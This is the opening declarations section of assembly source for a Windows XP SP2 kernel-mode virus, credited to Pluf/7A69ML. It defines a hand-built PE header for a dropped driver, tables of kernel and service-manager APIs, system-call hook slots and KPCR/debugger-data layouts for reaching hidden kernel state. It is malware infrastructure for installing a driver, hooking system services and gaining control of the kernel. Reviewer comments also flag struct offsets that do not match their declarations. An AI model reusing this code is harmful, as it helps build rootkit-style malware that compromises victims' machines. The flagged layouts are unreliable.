;
; WinXPSP2.Cermalus by Pluf/7A69ML
; Spain/Spring 2007
;
; greetz:
; 7A69ML team: Nullsub, Dreg, Ripe and Sha0
; special thx to Slay, GriYo, and those people
; who help me and wish to remain anonymous ;)
;
; start includes by Dreg for masm32 (m32v9r, MASM32 9.0 version) compatibility:
.586 ; rdtsc...
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\macros\ucmacros.asm
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
; end
; Offsets of each saved register inside a PUSHAD frame, relative to esp after
; the pushad: edi is pushed last and therefore sits lowest. _pushad is the
; whole frame size (8 dwords). Used by @gparam / @cb_end below.
_pushad equ 8*4
_pushad_eax equ 7*4
_pushad_ecx equ 6*4
_pushad_edx equ 5*4
_pushad_ebx equ 4*4
_pushad_esp equ 3*4
_pushad_ebp equ 2*4
_pushad_esi equ 1*4
_pushad_edi equ 0*4
; Subset of the PE/COFF constants needed to describe the hand-built driver
; image (see pehdr below).
IMAGE_FILE_MACHINE_I386 equ 014Ch
IMAGE_SUBSYSTEM_NATIVE equ 01h
IMAGE_SUBSYSTEM_WINDOWS_GUI equ 02h
IMAGE_SUBSYSTEM_WINDOWS_CUI equ 03h
IMAGE_FILE_EXECUTABLE_IMAGE equ 00002h
IMAGE_FILE_32BIT_MACHINE equ 00100h
IMAGE_FILE_SYSTEM equ 01000h
IMAGE_FILE_DLL equ 02000h
; Padding sizes in bytes; the code that consumes them is outside this view.
STATIC_PADD equ 4096
DYNAMIC_PADD equ 2048
; dos header:
; IMAGE_DOS_HEADER (40h bytes) with the usual MZ stub values pre-filled.
; mz_lfanew = 0A8h = size mzhdr (40h) + size dos_stub (68h), i.e. the PE
; signature is expected immediately after the DOS stub below.
mzhdr struct
mz_magic dw 05A4Dh ; "MZ"
mz_cblp dw 00090h
mz_cp dw 00003h
mz_crcl dw 00000h
mz_cparhdr dw 00004h
mz_minalloc dw 00000h
mz_maxalloc dw 0FFFFh
mz_ss dw 00000h
mz_sp dw 000B8h
mz_csum dw 00000h
mz_ip dw 00000h
mz_cs dw 00000h
mz_lfarlc dw 00040h
mz_ovno dw 00000h
mz_res dw 4 dup (0)
mz_oemid dw 00000h
mz_oeminfo dw 00000h
mz_res2 dw 10 dup (0)
mz_lfanew dd 000000A8h ; file offset of the PE signature
mzhdr ends
; dos stub:
; 104-byte (68h) DOS stub: the tiny 16-bit program that prints
; "This program cannot be run in DOS mode." (the ASCII bytes are visible
; from 054h 068h 069h 073h ...), followed by bytes of the form found after a
; linker-generated stub, including 052h 069h 063h 068h = "Rich".
; Kept as raw bytes so the dropped image looks like a normally linked file.
dos_stub struct
db 00Eh, 01Fh, 0BAh, 00Eh, 000h, 0B4h, 009h, 0CDh
db 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06Fh, 067h, 072h
db 061h, 06Dh, 020h, 063h, 061h, 06Eh, 06Eh, 06Fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06Eh
db 020h, 069h, 06Eh, 020h, 044h, 04Fh, 053h, 020h
db 06Dh, 06Fh, 064h, 065h, 02Eh, 00Dh, 00Dh, 00Ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 05Dh, 017h, 01Dh, 0DBh, 019h, 076h, 073h, 088h
db 019h, 076h, 073h, 088h, 019h, 076h, 073h, 088h
db 0E5h, 056h, 061h, 088h, 018h, 076h, 073h, 088h
db 052h, 069h, 063h, 068h, 019h, 076h, 073h, 088h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dos_stub ends
; data directory entry:
; IMAGE_DATA_DIRECTORY: one (rva, size) pair; pehdr holds 16 of these.
pe_ddir struct
ddir_rva dd ? ; 00h
ddir_size dd ? ; 04h
pe_ddir ends
; export directory:
; IMAGE_EXPORT_DIRECTORY (28h bytes). The three rva* fields point to the
; parallel address / name / ordinal tables used when resolving exports by name.
pedir_export struct
flags dd ? ; 00h
timedate dd ? ; 04h
major dw ? ; 08h
minor dw ? ; 0Ah
dllname dd ? ; 0Ch rva of the module name
dllbase dd ? ; 10h ordinal base
numoffunctions dd ? ; 14h
numofnames dd ? ; 18h
rvaoffunctions dd ? ; 1Ch
rvaofnames dd ? ; 20h
rvaofordinals dd ? ; 24h
pedir_export ends
; import directory:
; IMAGE_IMPORT_DESCRIPTOR (14h bytes), one per imported module.
pedir_import struct
ilt dd ? ; 00h import lookup table (OriginalFirstThunk)
timedate dd ? ; 04h
forward dd ? ; 08h forwarder chain
name_ dd ? ; 0Ch rva of the module name
iat dd ? ; 10h import address table (FirstThunk)
pedir_import ends
; PE header:
; IMAGE_NT_HEADERS for the embedded driver: signature (4) + file header (14h)
; + optional header (0E0h) = 0F8h bytes, with every value pre-filled.
; Sizes are computed from the labels drvcode_begin/drvcode_end and
; drv_begin/drv_end, which are defined elsewhere in this file.
; Section and file alignment are both 20h, so offsets equal RVAs and the
; image is not page-rounded; headers end at 200h (see sys_body), which is
; also the RVA/raw address of the single .text section and the entry point.
pehdr struct
; signature:
pe_signature dd 00004550h ; "PE\0\0"
; file header:
pe_coff_machine dw 0014Ch ; IMAGE_FILE_MACHINE_I386
pe_coff_numofsects dw 00001h ; one section (sectbl.text)
pe_coff_timedatastamp dd 045F207DDh
pe_coff_symrva dd 000000000h
pe_coff_symcount dd 000000000h
pe_coff_ophdrsize dw 000E0h ; size of the optional header below
; 010Eh = IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE | 000Ch
; (the 000Ch bits are not named in this file).
pe_coff_flags dw 0010Eh
; optional header:
pe_ophdr_magic dw 0010Bh ; PE32
pe_ophdr_majorlink db 005h
pe_ophdr_minorlink db 00Ch
pe_ophdr_sizeofcode dd (((offset drvcode_end - offset drvcode_begin)+(20h-1)) and (not(20h-1))) ; rounded up to file alignment
pe_ophdr_sizeofinitdata dd 000000000h
pe_ophdr_sizeofuinitdata dd 000000000h
pe_ophdr_entrypointrva dd 000000200h ; first byte of .text
pe_ophdr_baseofcoderva dd 000000200h
pe_ophdr_baseofdatarva dd (((offset drv_end - offset drv_begin)+(20h-1)) and (not(20h-1)))
pe_ophdr_imagebase dd 000010000h
pe_ophdr_sectalign dd 000000020h
pe_ophdr_filealign dd 000000020h
pe_ophdr_majorosv dw 00004h
pe_ophdr_minorosv dw 00000h
pe_ophdr_majorimagev dw 00000h
pe_ophdr_minorimagev dw 00000h
pe_ophdr_majorsubsv dw 00004h
pe_ophdr_minorsubsv dw 00000h
pe_ophdr_unknown dd 000000000h ; Win32VersionValue, reserved (0)
pe_ophdr_imagesize dd (offset drv_end - offset drv_begin)
pe_ophdr_hdrsize dd 000000200h ; = size sys_body
pe_ophdr_checksum dd 000000000h
pe_ophdr_subsystem dw 00001h ; IMAGE_SUBSYSTEM_NATIVE (kernel driver)
pe_ophdr_dllflags dw 00000h
pe_ophdr_stackreservesize dd 00100000h
pe_ophdr_stackcommitsize dd 00001000h
pe_ophdr_heapreservesize dd 00100000h
pe_ophdr_heapcommitsize dd 00001000h
pe_ophdr_loaderflags dd 00000000h
pe_ophdr_rvaandsizecount dd 00000010h ; 16 data directories follow
; data directory []
pe_dd_export pe_ddir <?>
pe_dd_import pe_ddir <?>
pe_dd_rsrc pe_ddir <?>
pe_dd_except pe_ddir <?>
pe_dd_security pe_ddir <?>
pe_dd_reloc pe_ddir <?>
pe_dd_debug pe_ddir <?>
pe_dd_arch pe_ddir <?>
pe_dd_global pe_ddir <?>
pe_dd_tls pe_ddir <?>
pe_dd_config pe_ddir <?>
pe_dd_bound pe_ddir <?>
pe_dd_iat pe_ddir <?>
pe_dd_delay pe_ddir <?>
pe_dd_com pe_ddir <?>
pe_dd_rsrv pe_ddir <?>
pehdr ends
; section table entry:
; IMAGE_SECTION_HEADER (28h bytes) for the driver's only section.
; sect_name is ".text" (2Eh 74h 65h 78h 74h) padded with zeros.
; Virtual and raw addresses coincide (200h) because of the 20h alignment.
pe_sect struct
sect_name db 2Eh, 74h, 65h, 78h, 74h, 3 dup(0)
sect_virtsize dd (offset drvcode_end - offset drvcode_begin)
sect_virtaddr dd 000000200h
sect_rawsize dd (((offset drvcode_end - offset drvcode_begin)+(20h-1)) and (not(20h-1))) ; rounded up to file alignment
sect_rawaddr dd 000000200h
sect_reladdr dd 000000000h
sect_lineaddr dd 000000000h
sect_relcount dw 00000h
sect_linecount dw 00000h
; 068000020h = CNT_CODE | MEM_NOT_PAGED | MEM_EXECUTE | MEM_READ
sect_flags dd 068000020h
pe_sect ends
; section table:
; Section table: exactly one entry, matching pe_coff_numofsects = 1.
sectbl struct
text pe_sect <>
sectbl ends
; basic .sys file format:
; Complete header block of the dropped .sys file:
;   40h (mzhdr) + 68h (dos_stub) + 0F8h (pehdr) + 28h (sectbl) + 38h (sys_pad)
;   = 200h bytes, which equals pe_ophdr_hdrsize and the .text raw/virtual
; address, so the driver code is expected to start right after sys_pad.
sys_body struct
sys_mz_hdr mzhdr <>
sys_dos dos_stub <>
sys_pe_hdr pehdr <>
sys_sectbl sectbl <>
sys_pad dd 14 dup(0) ; pads the headers to 200h
sys_body ends
;-------------------------------------
; ring0 data
;-------------------------------------
; ring0 apis structs:
; One resolved API slot: va = address once resolved; eat = value tied to the
; export table lookup (presumably the name hash or EAT index -- the code that
; fills it is outside this view). The *_api_count constants below count
; dwords, i.e. two per api_entry.
api_entry struct
va dd ?
eat dd ?
api_entry ends
; apis ntoskrnl.exe:
; ntoskrnl.exe exports the driver needs, one api_entry each, in the order the
; name table elsewhere in the file is expected to follow. Two of these
; (IoDriverObjectType, KeServiceDescriptorTable) are exported data, not
; functions, but share the same slot type.
ntosapi struct
DbgPrint api_entry <>
DbgPrintEx api_entry <>
DbgPrintReturnControlC api_entry <>
ExAllocatePool api_entry <>
ExFreePool api_entry <>
IoAllocateMdl api_entry <>
IoCompleteRequest api_entry <>
IoCreateDevice api_entry <>
IoCreateFile api_entry <>
IoDeleteDevice api_entry <>
IoDriverObjectType api_entry <> ; exported data (POBJECT_TYPE)
IoFreeMdl api_entry <>
KeBugCheck api_entry <>
KeInitializeDpc api_entry <>
KeInitializeSpinLock api_entry <>
KeInitializeTimer api_entry <>
KeServiceDescriptorTable api_entry <> ; exported data (SSDT descriptor)
KeSetTimer api_entry <>
MmGetSystemRoutineAddress api_entry <>
MmProbeAndLockPages api_entry <>
MmUnlockPages api_entry <>
ObDereferenceObject api_entry <>
ObReferenceObjectByHandle api_entry <>
ProbeForRead api_entry <>
ProbeForWrite api_entry <>
PsRemoveCreateThreadNotifyRoutine api_entry <>
PsSetCreateProcessNotifyRoutine api_entry <>
PsSetCreateThreadNotifyRoutine api_entry <>
ZwClose api_entry <>
ZwCreateSection api_entry <>
ZwMapViewOfSection api_entry <>
ZwOpenDirectoryObject api_entry <>
ZwOpenFile api_entry <>
ZwQueryInformationFile api_entry <>
ZwUnmapViewOfSection api_entry <>
wcscmp api_entry <>
ntosapi ends
ntos_api_count equ (size ntosapi) shr 2 ; dword count (2 per entry), not entry count
; api hal.dll:
; hal.dll exports used for spin-lock handling (see kirql/kspinlock in ring0data).
halapi struct
KeAcquireSpinLock api_entry <>
KeGetCurrentIrql api_entry <>
KeReleaseSpinLock api_entry <>
halapi ends
hal_api_count equ (size halapi) shr 2 ; dword count (2 per entry)
; ring0api:
; All ring0 imports: each module's base address followed by its api table.
ring0api struct
ntos_base dd ? ; ntoskrnl.exe image base
ntos ntosapi <>
hal_base dd ? ; hal.dll image base
hal halapi <>
ring0api ends
ring0_api_count equ (size ring0api) shr 2 ; dword count of the whole struct
; ring0 nt services:
; One system-service slot: va = routine address, ssdt = the matching service
; table slot (presumably its index or address -- the code that fills it is
; outside this view).
ntserv_entry struct
va dd ?
ssdt dd ?
ntserv_entry ends
; The three system services the driver tracks (each also has a
; *_param_count constant in the hooks section below).
ntservices struct
NtDebugActiveProcess ntserv_entry <>
NtEnumerateBootEntries ntserv_entry <>
NtOpenFile ntserv_entry <>
ntservices ends
ntservices_count equ (size ntservices) shr 2 ; dword count (2 per entry)
; ring0data:
; Driver-global state block; @cb_begin loads a pointer to it into ebx.
ring0data struct
api ring0api <> ; resolved imports
ntdll_map_base dd ? ; base of a mapped ntdll.dll view (ZwMapViewOfSection is imported above)
services ntservices <>
service_table dd ? ; KiServiceTable base
service_count dd ? ; number of entries in service_table
driver_object dd ? ; DRIVER_OBJECT passed to DriverEntry
module_list dd ? ; PsLoadedModuleList head
kirql dd ? ; saved IRQL for KeAcquireSpinLock/KeReleaseSpinLock
kspinlock dd ? ; KSPIN_LOCK
reserved dd 4 dup(?)
ring0data ends
;--------------------------------------
; ring0 include
;--------------------------------------
; ntstatus:
; NTSTATUS values, bug-check code, IRP major codes, OBJECT_ATTRIBUTES flags,
; pseudo-handles, enums and typedefs from the DDK that the ring0 part uses.
; Values are the documented DDK ones.
STATUS_SUCCESS equ 000000000h
STATUS_UNSUCCESSFUL equ 0C0000001h
STATUS_NOT_IMPLEMENTED equ 0C0000002h
STATUS_IMAGE_NOT_AT_BASE equ 040000003h
; bugcheck code:
POWER_FAILURE_SIMULATE equ 0000000E5h
; major function codes for IRPs (indexes into driver_object.MajorFunction):
IRP_MJ_CREATE equ 00h
IRP_MJ_CREATE_NAMED_PIPE equ 01h
IRP_MJ_CLOSE equ 02h
IRP_MJ_READ equ 03h
IRP_MJ_WRITE equ 04h
IRP_MJ_QUERY_INFORMATION equ 05h
IRP_MJ_SET_INFORMATION equ 06h
IRP_MJ_QUERY_EA equ 07h
IRP_MJ_SET_EA equ 08h
IRP_MJ_FLUSH_BUFFERS equ 09h
IRP_MJ_QUERY_VOLUME_INFORMATION equ 0Ah
IRP_MJ_SET_VOLUME_INFORMATION equ 0Bh
IRP_MJ_DIRECTORY_CONTROL equ 0Ch
IRP_MJ_FILE_SYSTEM_CONTROL equ 0Dh
IRP_MJ_DEVICE_CONTROL equ 0Eh
IRP_MJ_INTERNAL_DEVICE_CONTROL equ 0Fh
IRP_MJ_SHUTDOWN equ 10h
IRP_MJ_LOCK_CONTROL equ 11h
IRP_MJ_CLEANUP equ 12h
IRP_MJ_CREATE_MAILSLOT equ 13h
IRP_MJ_QUERY_SECURITY equ 14h
IRP_MJ_SET_SECURITY equ 15h
IRP_MJ_POWER equ 16h
IRP_MJ_SYSTEM_CONTROL equ 17h
IRP_MJ_DEVICE_CHANGE equ 18h
IRP_MJ_QUERY_QUOTA equ 19h
IRP_MJ_SET_QUOTA equ 1Ah
IRP_MJ_PNP equ 1Bh
IRP_MJ_PNP_POWER equ IRP_MJ_PNP
IRP_MJ_MAXIMUM_FUNCTION equ 1Bh ; MajorFunction[] has IRP_MJ_MAXIMUM_FUNCTION + 1 slots
; values for the Attributes field of object_attributes:
OBJ_INHERIT equ 00000002h
OBJ_PERMANENT equ 00000010h
OBJ_EXCLUSIVE equ 00000020h
OBJ_CASE_INSENSITIVE equ 00000040h
OBJ_OPENIF equ 00000080h
OBJ_OPENLINK equ 00000100h
OBJ_KERNEL_HANDLE equ 00000200h
OBJ_VALID_ATTRIBUTES equ 000003F2h
; pseudo-handles accepted by the Zw* routines:
NtCurrentProcess equ -1
NtCurrentThread equ -2
; (enum) pool type:
NonPagedPool equ 0
PagedPool equ 1
; (enum) lock operation:
IoReadAccess equ 0
IoWriteAccess equ 1
IoModifyAccess equ 2
; (enum) mode:
KernelMode equ 0
UserMode equ 1
MaximumMode equ 2
STANDARD_RIGHTS_REQUIRED equ 000F0000h
FILE_DIRECTORY_FILE equ 00000001h
FILE_SYNCHRONOUS_IO_NONALERT equ 020h
FileStandardInformation equ 5 ; FILE_INFORMATION_CLASS for file_standard_information
; (enum) section inherit:
ViewShare equ 1
ViewUnmap equ 2
; Interrupt Request Level (IRQL):
KIRQL typedef BYTE
PKIRQL typedef PTR BYTE
; Spin Lock:
KSPIN_LOCK typedef DWORD ; ULONG_PTR
PKSPIN_LOCK typedef PTR DWORD
; list entry:
; LIST_ENTRY: doubly linked list node (forward/backward links).
list_entry struct ; size = 08h
Flink dd ? ; 00h
Blink dd ? ; 04h
list_entry ends
; unicode string:
; UNICODE_STRING: counted UTF-16 string; lengths are in bytes, not characters,
; and Buffer is not necessarily NUL-terminated.
unicode_string struct ; size = 08h
_Length dw ? ; 00h bytes in use
MaximumLength dw ? ; 02h bytes allocated
Buffer dd ? ; 04h PWSTR
unicode_string ends
; large integer:
; LARGE_INTEGER as two dwords (low part first).
large_integer struct ; size = 08h
LowPart dd ? ; 00h
HighPart dd ? ; 04h
large_integer ends
; io status block:
; IO_STATUS_BLOCK returned by the Zw* I/O routines.
io_status_block struct ; size = 08h
Status dd ? ; 00h NTSTATUS
Information dd ? ; 04h request-specific (e.g. bytes transferred)
io_status_block ends
; memory descriptor list:
; MDL header (x86): describes the physical pages of a buffer; the page frame
; array follows the struct. Used with IoAllocateMdl/MmProbeAndLockPages.
mdl struct ; size = 01Ch
Next dd ? ; 00h
_Size dw ? ; 04h
MdlFlags dw ? ; 06h
Process dd ? ; 08h
MappedSystemVa dd ? ; 0Ch
StartVa dd ? ; 10h page-aligned start of the buffer
ByteCount dd ? ; 14h
ByteOffset dd ? ; 18h offset of the buffer within its first page
mdl ends
; driver extension:
; DRIVER_EXTENSION. Note: the declared size is 1Ch; the "size = 18h" comment
; gives the offset of the last field, not the total.
driver_extension struct ; size = 18h
DriverObject dd ? ; 00h
AddDevice dd ? ; 04h
Count dd ? ; 08h
ServiceKeyName unicode_string <> ; 0Ch
ClientDriverExtension dd ? ; 14h
FsFilterCallbacks dd ? ; 18h
driver_extension ends
; driver object:
; DRIVER_OBJECT (0A8h bytes). MajorFunction is the IRP dispatch table
; (28 entries, indexed by the IRP_MJ_* codes above); DriverUnload is the
; routine the I/O manager calls when the driver is stopped.
driver_object struct ; size = 0A8h
_Type dw ? ; 00h
_Size dw ? ; 02h (follows the 2-byte _Type; the original comment said 04h)
DeviceObject dd ? ; 04h
Flags dd ? ; 08h
DriverStart dd ? ; 0Ch image base
DriverSize dd ? ; 10h
DriverSection dd ? ; 14h loader entry (see module_entry)
DriverExtension dd ? ; 18h
DriverName unicode_string <> ; 1Ch
HardwareDatabase dd ? ; 24h
FastIoDispatch dd ? ; 28h
DriverInit dd ? ; 2Ch
DriverStartIo dd ? ; 30h
DriverUnload dd ? ; 34h
MajorFunction dd (IRP_MJ_MAXIMUM_FUNCTION + 1) dup(?) ; 0038h .. 0A7h
driver_object ends
; object directory entry:
; OBJECT_DIRECTORY_ENTRY: one hash-chain node in an object directory.
object_directory_entry struct ; size = 08h
ChainLink dd ? ; 00h next entry in the same bucket
Object dd ? ; 04h pointer to the object body
object_directory_entry ends
; object directory:
; OBJECT_DIRECTORY: 37 hash buckets of object_directory_entry chains.
; Note: the declared size is 0A4h (SymbolicLinkUsageCount is the last field at
; 0A2h); the "size = 0A2h" comment gives the last offset, not the total.
object_directory struct ; size = 0A2h
HashBuckets dd 37 dup(?) ; 00h
_Lock dd ? ; 094h
DeviceMap dd ? ; 098h
SessionId dd ? ; 09Ch
Reserved dw ? ; 0A0h
SymbolicLinkUsageCount dw ? ; 0A2h
object_directory ends
; object header:
; OBJECT_HEADER as it precedes every object body.
; NOTE(review): the offset comments (04h twice, 10h twice) imply that
; HandleCount/NextToFree and ObjectCreateInfo/QuotaBlockCharged overlap, but
; they are declared as separate fields with no `union` (compare nt_tib below).
; As written the struct is 024h bytes: _Type lands at 0Ch, the offset bytes at
; 10h..13h, SecurityDescriptor at 1Ch and Body at 20h, i.e. 4 resp. 8 bytes
; later than commented. Verify every use of fields after HandleCount.
object_header struct ; size = 018h
PointerCount dd ? ; 00h
HandleCount dd ? ; 04h
NextToFree dd ? ; 04h
_Type dd ? ; 08h
NameInfoOffset db ? ; 0Ch
HandleInfoOffset db ? ; 0Dh
QuotaInfoOffset db ? ; 0Eh
Flags db ? ; 0Fh
ObjectCreateInfo dd ? ; 10h
QuotaBlockCharged dd ? ; 10h
SecurityDescriptor dd ? ; 14h
Body dd ? ; 18h start of the object body
object_header ends
; ServiceDescriptorEntry:
; One entry of KeServiceDescriptorTable: the system service table and its
; size. ServiceTableBase/NumberOfServices feed ring0data.service_table /
; service_count.
service_descriptor_entry struct ; size = 10h
ServiceTableBase dd ? ; 00h
ServiceCounterTableBase dd ? ; 04h
NumberOfServices dd ? ; 08h
ParamTableBase dd ? ; 0Ch
service_descriptor_entry ends
; deferred procedure call (DPC) object:
; KDPC (x86, 020h bytes), initialised with KeInitializeDpc; DeferredRoutine
; receives DeferredContext and the two SystemArgument values
; (custom_dpc_param_count = 4 below).
kdpc struct ; size = 020h
_Type dw ? ; 00h
Number db ? ; 02h
Importance db ? ; 03h
DpcListEntry list_entry <> ; 04h
DeferredRoutine dd ? ; 0Ch
DeferredContext dd ? ; 10h
SystemArgument1 dd ? ; 14h
SystemArgument2 dd ? ; 18h
_Lock dd ? ; 1Ch
kdpc ends
; timer object:
; KTIMER (x86, 028h bytes): Header is the 16-byte DISPATCHER_HEADER;
; Dpc is the KDPC queued on expiry; Period != 0 makes it periodic.
ktimer struct ; size = 028h
Header dd 4 dup(?) ; 00h DISPATCHER_HEADER
DueTime large_integer <> ; 10h
TimerListEntry list_entry <> ; 18h
Dpc dd ? ; 20h
Period dd ? ; 24h milliseconds
ktimer ends
; object attributes:
; OBJECT_ATTRIBUTES for the Zw* open/create calls; see @init_object_attributes.
object_attributes struct ; size = 18h
_Length dd ? ; 00h must be size object_attributes
RootDirectory dd ? ; 04h
ObjectName dd ? ; 08h PUNICODE_STRING
Attributes dd ? ; 0Ch OBJ_* flags
SecurityDescriptor dd ? ; 10h
SecurityQualityOfService dd ? ; 14h
object_attributes ends
; file standard information:
; FILE_STANDARD_INFORMATION (018h bytes), returned by ZwQueryInformationFile
; for FileStandardInformation; EndOfFile is the file size.
file_standard_information struct ; size = 018h
AllocationSize large_integer <> ; 00h
EndOfFile large_integer <> ; 08h
NumberOfLinks dd ? ; 10h
DeletePending db ? ; 14h
Directory db ? ; 15h
db 2 dup(?) ; 16h padding to 018h
file_standard_information ends
; thread information block, XPSP2 version:
; NT_TIB (1Ch bytes). FiberData and Version share offset 10h via a MASM
; union; Self points back at the TIB itself.
nt_tib struct ; sizeof = 1Ch
ExceptionList dd ? ; 00h head of the SEH chain (fs:[0])
StackBase dd ? ; 04h
StackLimit dd ? ; 08h
SubSystemTib dd ? ; 0Ch
union
FiberData dd ? ; 10h
Version dd ? ; 10h
ends
ArbitraryUserPointer dd ? ; 14h
Self dd ? ; 18h
nt_tib ends
; processor control region, XPSP2 version:
; KPCR for x86 XP SP2 (054h bytes), reachable through fs in kernel mode.
; KdVersionBlock sits at 34h, matching KPCR_KDVERSIONBLOCK_OFFSET below, and
; leads to kddebugger_data32.
kpcr struct ; size = 54h
NtTib nt_tib <> ; 00h
SelfPcr dd ? ; 1Ch
Prcb dd ? ; 20h
Irql dd ? ; 24h
IRR dd ? ; 28h
IrrActive dd ? ; 2Ch
IDR dd ? ; 30h
KdVersionBlock dd ? ; 34h ptr
IDT dd ? ; 38h
GDT dd ? ; 3Ch
TSS dd ? ; 40h
MajorVersion dw ? ; 44h
MinorVersion dw ? ; 46h
SetMember dd ? ; 48h
StallScaleFactor dd ? ; 4Ch
DebugActive db ? ; 50h
Number db ? ; 51h processor number
db 2 dup(?) ; 052h padding
kpcr ends
; PsLoadedModuleList module entry
; Leading part of a PsLoadedModuleList entry (the loader's per-image record);
; only the fields up to the module name are declared, the rest is omitted.
; unk1/unk2 are unnamed here -- do not rely on them.
module_entry struct
list list_entry <> ; links in PsLoadedModuleList
unk1 dd 4 dup(?)
base dd ? ; image base
entrypoint dd ?
unk2 dd ?
path unicode_string <> ; full image path
_name unicode_string <> ; base file name
; ...
module_entry ends
; offset KPCR->KdVersionBlock, XPSP2 version:
; Offset of kpcr.KdVersionBlock (matches the kpcr struct above).
KPCR_KDVERSIONBLOCK_OFFSET equ 034h
; DBGKD_DEBUG_DATA_HEADER32: list links, owner tag and the size of the record
; that follows. Note: declared size is 10h; "size = 0Ch" is the last offset.
dbgkd_debug_data_header32 struct ; size = 0Ch
List list_entry <> ; 00h
OwnerTag dd ? ; 08h
_size dd ? ; 0Ch size of the enclosing record
dbgkd_debug_data_header32 ends
; kernel debugger data32, XPSP2 version:
; KDDEBUGGER_DATA32 (XP SP2 layout), located through kpcr.KdVersionBlock.
; Every dd after the header is the address of a kernel-internal variable or
; list head (e.g. PsLoadedModuleList, ObpRootDirectoryObject), which is how
; the driver reaches unexported kernel state; KernBase is the kernel image
; base. Field order must match the running kernel exactly.
kddebugger_data32 struct
Header dbgkd_debug_data_header32 <>
KernBase dd ?
BreakpointWithStatus dd ?
SavedContext dd ?
ThCallbackStack dw ?
NextCallback dw ?
FramePointer dw ?
PaeEnabled dw ?
KiCallUserMode dd ?
KeUserCallbackDispatcher dd ?
PsLoadedModuleList dd ? ; head of the loaded-module list (see module_entry)
PsActiveProcessHead dd ?
PspCidTable dd ?
ExpSystemResourcesList dd ?
ExpPagedPoolDescriptor dd ?
ExpNumberOfPagedPools dd ?
KeTimeIncrement dd ?
KeBugCheckCallbackListHead dd ?
KiBugcheckData dd ?
IopErrorLogListHead dd ?
ObpRootDirectoryObject dd ? ; root of the object namespace (see object_directory)
ObpTypeObjectType dd ?
MmSystemCacheStart dd ?
MmSystemCacheEnd dd ?
MmSystemCacheWs dd ?
MmPfnDatabase dd ?
MmSystemPtesStart dd ?
MmSystemPtesEnd dd ?
MmSubsectionBase dd ?
MmNumberOfPagingFiles dd ?
MmLowestPhysicalPage dd ?
MmHighestPhysicalPage dd ?
MmNumberOfPhysicalPages dd ?
MmMaximumNonPagedPoolInBytes dd ?
MmNonPagedSystemStart dd ?
MmNonPagedPoolStart dd ?
MmNonPagedPoolEnd dd ?
MmPagedPoolStart dd ?
MmPagedPoolEnd dd ?
MmPagedPoolInformation dd ?
MmPageSize dd ?
MmSizeOfPagedPoolInBytes dd ?
MmTotalCommitLimit dd ?
MmTotalCommittedPages dd ?
MmSharedCommit dd ?
MmDriverCommit dd ?
MmProcessCommit dd ?
MmPagedPoolCommit dd ?
MmExtendedCommit dd ?
MmZeroedPageListHead dd ?
MmFreePageListHead dd ?
MmStandbyPageListHead dd ?
MmModifiedPageListHead dd ?
MmModifiedNoWritePageListHead dd ?
MmAvailablePages dd ?
MmResidentAvailablePages dd ?
PoolTrackTable dd ?
NonPagedPoolDescriptor dd ?
MmHighestUserAddress dd ?
MmSystemRangeStart dd ?
MmUserProbeAddress dd ?
KdPrintCircularBuffer dd ?
KdPrintCircularBufferEnd dd ?
KdPrintWritePointer dd ?
KdPrintRolloverCount dd ?
MmLoadedUserImageList dd ?
kddebugger_data32 ends
;--------------------------------------
; ring3 data
;--------------------------------------
; ring3 apis structs:
; Same layout as the ring0 api_entry declared earlier in this file.
; NOTE(review): this is a second STRUCT declaration of the same name; confirm
; that the assembler in use accepts the duplicate, or drop this copy.
api_entry struct
va dd ?
eat dd ?
api_entry ends
; apis kernel32.dll:
; kernel32.dll exports used by the ring3 part (file/mapping/memory APIs).
kernapi struct
CloseHandle api_entry <>
CreateFileA api_entry <>
CreateFileMappingA api_entry <>
DeleteFileA api_entry <>
GetFullPathNameA api_entry <>
LoadLibraryA api_entry <>
MapViewOfFile api_entry <>
UnmapViewOfFile api_entry <>
VirtualAlloc api_entry <>
VirtualFree api_entry <>
WriteFile api_entry <>
kernapi ends
kern_api_count equ (size kernapi) shr 2 ; dword count (2 per entry)
; apis ntdll.dll:
; ntdll.dll exports used by the ring3 part; the single entry pairs with the
; NtEnumerateBootEntries slot in the ring0 ntservices struct.
ntdllapi struct
ZwEnumerateBootEntries api_entry <>
ntdllapi ends
ntdll_api_count equ (size ntdllapi) shr 2 ; dword count (2 per entry)
; apis advapi32.dll:
; advapi32.dll service-control-manager APIs used to install, start, stop and
; remove the driver service (handles live in ring3data.scm_handle/service_handle).
advapi struct
CloseServiceHandle api_entry <>
ControlService api_entry <>
CreateServiceA api_entry <>
DeleteService api_entry <>
OpenSCManagerA api_entry <>
OpenServiceA api_entry <>
StartServiceA api_entry <>
advapi ends
adv_api_count equ (size advapi) shr 2 ; dword count (2 per entry)
; ring3api:
; All ring3 imports: each module's base address followed by its api table.
ring3api struct
kern_base dd ? ; kernel32.dll base
kern kernapi <>
adv_base dd ? ; advapi32.dll base
adv advapi <>
ntdll_base dd ? ; ntdll.dll base
ntdll ntdllapi <>
ring3api ends
ring3_api_count equ (size ring3api) shr 2 ; dword count of the whole struct
; ring3data:
; Ring3 state block: resolved imports plus the handles held while the driver
; file is written and the service is created.
ring3data struct
api ring3api <>
file_handle dd ? ; CreateFileA result
map_addr dd ? ; MapViewOfFile result
map_handle dd ? ; CreateFileMappingA result
scm_handle dd ? ; OpenSCManagerA result
service_handle dd ? ; CreateServiceA/OpenServiceA result
buff dd ? ; scratch buffer (VirtualAlloc)
ring3data ends
;--------------------------------------
; ring3 include
;--------------------------------------
; service status:
; SERVICE_STATUS as filled by ControlService.
service_status struct ; size = 01Ch
dwServiceType dd ? ; 00h
dwCurrentState dd ? ; 04h
dwControlsAccepted dd ? ; 08h
dwWin32ExitCode dd ? ; 0Ch
dwServiceSpecificExitCode dd ? ; 10h
dwCheckPoint dd ? ; 14h
dwWaitHint dd ? ; 18h
service_status ends
;--------------------------------------
; hooks/callbacks data
;--------------------------------------
; Per-hook descriptor: a signature to recognise the stub and the address to
; return to. hook_data_offset is where the descriptor sits relative to a stub;
; the stub code itself is outside this view.
hook_data_offset equ 0Bh
hook_data struct
signature dd ?
return_ dd ?
hook_data ends
